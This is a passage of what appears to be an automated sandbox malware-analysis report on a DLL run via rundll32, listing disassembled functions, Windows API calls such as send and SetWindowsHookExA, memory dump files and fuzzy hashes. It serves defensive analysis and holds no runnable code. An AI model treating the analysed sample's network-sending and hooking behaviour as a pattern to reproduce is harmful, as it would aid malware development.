                                                                                                                          Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                            • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                            • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                          • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                          • _strcat.LIBCMT ref: 1001310A
                                                                                                                            • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                          • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                          • String ID: :
                                                                                                                          • API String ID: 16450322-3653984579
                                                                                                                          • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                          • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                          • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                          • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                            • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                            • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                            • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                            • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                          • API String ID: 3274081130-63838506
                                                                                                                          • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                          • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                          • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                          • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                          • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                          • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                          • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                          • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                          • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                          • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                          • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2459298410-0
                                                                                                                          • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                          • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                          • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                          • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 365290523-0
                                                                                                                          • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                          • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                          • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                          • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$DesktopVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1055025324-0
                                                                                                                          • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                          • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                          • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                          • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 1002C6E7
                                                                                                                            • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                          • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 26245289-0
                                                                                                                          • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                          • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                          • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                          • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                          • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                          • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                          • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                          • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3058430110-0
                                                                                                                          • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                          • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                          • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                          • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetDC.USER32(?), ref: 1002658E
                                                                                                                          • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                          • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3511876931-0
                                                                                                                          • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                          • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                          • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                          • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __msize_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1288803200-0
                                                                                                                          • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                          • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                          • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                          • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                          • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                          • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePeek$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3998274959-0
                                                                                                                          • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                          • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                          • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                          • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                            • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                            • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                          • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1532457625-0
                                                                                                                          • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                          • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
